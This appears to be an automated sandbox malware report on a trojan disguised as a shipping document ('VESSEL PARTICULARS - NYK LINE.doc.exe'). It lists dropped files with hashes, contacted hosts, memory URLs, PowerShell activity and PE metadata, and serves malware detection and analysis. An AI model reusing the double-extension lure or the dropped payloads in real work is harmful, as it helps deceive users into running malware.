                                                            		unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.503252579.0000000002E61000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://www.sakkal.comVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.503892800.0000000003E61000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown

                                                              Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              31.14.69.10
                                                              		store2.gofile.ioVirgin Islands (BRITISH)
                                                              		199483LINKER-ASFRfalse

                                                              Private

                                                              IP
                                                              192.168.2.1

                                                              General Information

                                                              Joe Sandbox Version:33.0.0 White Diamond
                                                              Analysis ID:492154
                                                              Start date:28.09.2021
                                                              Start time:12:16:19
                                                              Joe Sandbox Product:CloudBasic
                                                              Overall analysis duration:0h 15m 51s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:light
                                                              Sample file name:VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                              Number of analysed new started processes analysed:32
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • HDC enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Detection:MAL
                                                              Classification:mal100.troj.evad.winEXE@35/20@49/2
                                                              EGA Information:Failed
                                                              HDC Information:
                                                              • Successful, ratio: 88.9% (good quality ratio 83.7%)
                                                              • Quality average: 81.6%
                                                              • Quality standard deviation: 27.8%
                                                              HCA Information:
                                                              • Successful, ratio: 82%
                                                              • Number of executed functions: 0
                                                              • Number of non-executed functions: 0
                                                              Cookbook Comments:
                                                              • Adjust boot time
                                                              • Enable AMSI
                                                              • Found application associated with file extension: .exe
                                                              • Override analysis time to 240s for sample based on specific behavior
                                                              Warnings:
                                                              Show All
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                              • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 131.253.33.200, 13.107.22.200, 204.79.197.200, 13.107.21.200, 13.107.42.16, 13.107.5.88, 20.199.120.85, 20.199.120.182, 20.199.120.151
                                                              • Excluded domains from analysis (whitelisted): client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, config-edge-skype.l-0007.l-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, prod.fs.microsoft.com.akadns.net, l-0007.l-msedge.net, config.edge.skype.com, www.bing.com, client.wns.windows.com, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, dual-a-0001.a-msedge.net, e1723.g.akamaiedge.net, dual-a-0001.dc-msedge.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, l-0007.config.skype.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              12:17:30API Interceptor147x Sleep call for process: powershell.exe modified
                                                              12:19:18API Interceptor811x Sleep call for process: VESSEL PARTICULARS - NYK LINE.doc.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              No context

                                                              Domains

                                                              No context

                                                              ASN

                                                              No context

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VESSEL PARTICULARS - NYK LINE.doc.exe.log
                                                              Process:C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):1119
                                                              Entropy (8bit):5.356708753875314
                                                              Encrypted:false
                                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
                                                              MD5:3197B1D4714B56F2A6AC9E83761739AE
                                                              SHA1:3B38010F0DF51C1D4D2C020138202DABB686741D
                                                              SHA-256:40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
                                                              SHA-512:58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
                                                              Malicious:true
                                                              Reputation:unknown
                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):19732
                                                              Entropy (8bit):5.601737779976581
                                                              Encrypted:false
                                                              SSDEEP:384:jtNzXnq0+/aa4rIubCLnYSBKnUgul9tqpaeQ99gtqceZgVjpwSVyY3:qtbuiY4KBul7aat8EgVjplL3
                                                              MD5:67E3C6A1F09FBDFB78277D8465344B09
                                                              SHA1:D7CA81E221C0A645B5D71811013E9874EB6FD210
                                                              SHA-256:E37FC23E37B031261CCE67E4BC4B05784FF02DFF5111447C257587156848E1F9
                                                              SHA-512:7936F63C184C5E7DF4A1870C743805DC0BDE1DD878472854CAEE4C4A3AB476AAD32C6EE0C36A3E143CB55A92E24BD4A50FC4CBF4DC4E2A27D3DE0B94E9C10675
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: @...e...................t...........t.....R..........@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                              C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                                                              Process:C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):91000
                                                              Entropy (8bit):6.241345766746317
                                                              Encrypted:false
                                                              SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                              MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                              SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                              SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                              SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              • Antivirus: Metadefender, Detection: 3%, Browse
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Reputation:unknown
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Process:C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):393216
                                                              Entropy (8bit):2.6309833530297553
                                                              Encrypted:false
                                                              SSDEEP:3072:qx4Jmb4+WHRWm+3TkQ/b62tN+mbjOKC1g2L4o:qvb4+WZQJ0
                                                              MD5:93445DF2C96362810E0395C5C867700E
                                                              SHA1:645F936406B04FBFB737BBFFB5678D5255C6EC34
                                                              SHA-256:ECB4FE719A7FC1365D70EC9DB8B3C74CB4BF8968324C25D3817FCC5628FAE6FA
                                                              SHA-512:BFCFC7C220963F8269537B737D71251DFE3A9F6A800E7D65E3A1FD449A4F3F9E12C7F20207543009F8655A4FDFA672A11173DE27E682478DA4F15A0875F3BAE8
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: Virustotal, Detection: 59%, Browse
                                                              • Antivirus: Metadefender, Detection: 31%, Browse
                                                              • Antivirus: ReversingLabs, Detection: 86%
                                                              Reputation:unknown
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....@...............0..B...........a... ........@.. .......................`............@..................................`..K...........................@....................................................... ............... ..H............text...$A... ...B.................. ..`.rsrc...............D..............@..@.reloc.......@......................@..B.................a......H.......d0..4............^..(...........................................6.(.....(....*....(.....s....}.....s....}.....s....}.....(.....(....*....0..........~....%:....&~..........s....%.....s....(....s....%r...po....%r...po....%.o....%.o....(....&s....%r...po....%rU..po....%.o....%.o....(....o....s....%r...po....%r...po....%.o....%.o....(....o....*...0..O....... ....(.... ....(.....{....r...p(....r...p ............%..(.....o....u....}....*..0..m.........8 ...#.......@(.......
                                                              C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe:Zone.Identifier
                                                              Process:C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Reputation:unknown
                                                              Preview: [ZoneTransfer]....ZoneId=0
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25pybtxr.qnw.ps1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:Unknown
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a4itwdkw.tby.ps1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c43m055d.dm3.psm1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dsao55a1.fpx.ps1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fphenon1.pyw.psm1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_khzjh4ia.0w4.psm1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mccq3qmo.ceq.ps1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ntvz1zil.bqg.psm1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:Unknown
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: 1
                                                              C:\Users\user\Documents\20210928\PowerShell_transcript.928100.HddUljwH.20210928121728.txt
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1587
                                                              Entropy (8bit):4.711357895836663
                                                              Encrypted:false
                                                              SSDEEP:48:BZ4fv/GoOwvFqDYB1ZehYQUq+MLCaa8pCzCzCzCxZZH:BZC/GNw9qDo1Zv/qH2aa8pSSS6ZZ
                                                              MD5:195708BBB2ABD786F8E864D7DB562BC6
                                                              SHA1:2CEC805819E1EEE983E30EC13D47DCA0609D5232
                                                              SHA-256:400C70BCA53DD8EABD37AE8AD9E68CFDA82FA50BBAC29C9384AF1C8AF65A7B2C
                                                              SHA-512:79F03024FD14CE25395B3F5A358B002A4C4526B228CC4CE79B0D543E78BBA93D67054FEBB3DBB32E33146A233E0C8792861D6DA28A5C7F03C39B7C8DD73CAF36
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210928121729..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.bing.com..Process ID: 1688..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210928121729..**********************..PS>Test-Connection www.bing.com....Source Destination IPV4Address IPV6Address Bytes Time(ms)..------ ----------- ----------- ----------- ----- --------..DESKTOP-71... www.bing.com 131.
                                                              C:\Users\user\Documents\20210928\PowerShell_transcript.928100.X4LCDutf.20210928121740.txt
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1593
                                                              Entropy (8bit):4.71742658210396
                                                              Encrypted:false
                                                              SSDEEP:48:BZ4yev/GoOw+pzqDYB1Zeyh+2Uq+MLCaa8p6Y6Y6t63ZZM:BZg/GNw+dqDo1Z1+VqH2aa8p6Y6Y6t6A
                                                              MD5:045298FE090F18E8B9158E99161EE33A
                                                              SHA1:C5A7A013ABC96547BF3AD538C4F796FF485AD5F6
                                                              SHA-256:F1E1905D03C6152DE6DA2EB9CE0A61A0444EE3E81AE98320D23D57940D9849A9
                                                              SHA-512:F00C5FED636D01212D46A25CE433F86D1BA69FB6F40B2D4BB18CF33DC021C652686C273DA4925AFD033465F0E779A80D4C6E1FF5A018B4DA42C50DCCCFD9196E
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210928121741..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.twitter.com..Process ID: 6896..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210928121741..**********************..PS>Test-Connection www.twitter.com....Source Destination IPV4Address IPV6Address Bytes Time(ms)..------ ----------- ----------- ----------- ----- --------..DESKTOP-71... www.twitter.co
                                                              C:\Users\user\Documents\20210928\PowerShell_transcript.928100.hGl4G0Jf.20210928121730.txt
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1595
                                                              Entropy (8bit):4.741496017971404
                                                              Encrypted:false
                                                              SSDEEP:48:BZ4zv/GoOwhHqDYB1Ze2+Uq+MLCaa8pG7GhKZZHE:BZG/GNwNqDo1Z3dqH2aa8pG7GhKZhE
                                                              MD5:CA1AB6CBCC0E48A35728246390871CBE
                                                              SHA1:598F03F5B4AEB3F014634544BA1EEEB4C1E0CB72
                                                              SHA-256:89B7051BEFDB3BDA4D72BA0EF13E5C266EA0C3CF76BEDE74BAA43136197CD3A1
                                                              SHA-512:2901874B5F7A579B91E268C3440BB6950EAD381BE7E7C3192DFCAD60742D6AD74A7DA6FA107422AF2DD84D810E98889C68DC83F35DB1636FB4E0652C88C6682E
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210928121732..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.facebook.com..Process ID: 5512..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210928121732..**********************..PS>Test-Connection www.facebook.com....Source Destination IPV4Address IPV6Address Bytes Time(ms)..------ ----------- ----------- ----------- ----- --------..DESKTOP-71... www.facebook
                                                              C:\Users\user\Documents\20210928\PowerShell_transcript.928100.kBlHq1ED.20210928121728.txt
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:Unknown
                                                              Category:dropped
                                                              Size (bytes):1591
                                                              Entropy (8bit):4.748906617872173
                                                              Encrypted:false
                                                              SSDEEP:48:BZ4pv/GoOw6BqDYB1ZeEHUq+MLCaa8pZaajZZd:BZU/GNweqDo1ZV0qH2aa8pZaajZH
                                                              MD5:9F4B4256CA5DBF72B2F62982F431D0C9
                                                              SHA1:9C276DB0BB8740878C381E53158DCE8B58C4062A
                                                              SHA-256:982DCDDF4A31CD7D37375E655D9763BB6C65FC9AD812F1E19A324EAD1F3C7A67
                                                              SHA-512:DF8452941F98F180ED6ECF1A6921F0A8EF57714F315013D23863966BD4A7F1BB7CD03B76F1DC7B462D3F68A99F935C5AB4727FAD9C07C744625729041A2333B7
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210928121730..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com..Process ID: 5176..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210928121730..**********************..PS>Test-Connection www.google.com....Source Destination IPV4Address IPV6Address Bytes Time(ms)..------ ----------- ----------- ----------- ----- --------..DESKTOP-71... www.google.com

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):2.6309833530297553
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              • DOS Executable Generic (2002/1) 0.01%
                                                              File name:VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              File size:393216
                                                              MD5:93445df2c96362810e0395c5c867700e
                                                              SHA1:645f936406b04fbfb737bbffb5678d5255c6ec34
                                                              SHA256:ecb4fe719a7fc1365d70ec9db8b3c74cb4bf8968324c25d3817fcc5628fae6fa
                                                              SHA512:bfcfc7c220963f8269537b737d71251dfe3a9f6a800e7d65e3a1fd449a4f3f9e12c7f20207543009f8655a4fdfa672a11173de27e682478da4f15a0875f3bae8
                                                              SSDEEP:3072:qx4Jmb4+WHRWm+3TkQ/b62tN+mbjOKC1g2L4o:qvb4+WZQJ0
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....@...............0..B...........a... ........@.. .......................`............@................................

                                                              File Icon

                                                              Icon Hash:f150098119810105

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x40611e
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                              Time Stamp:0xA040EBAA [Sun Mar 14 03:53:14 2055 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:v4.0.30319
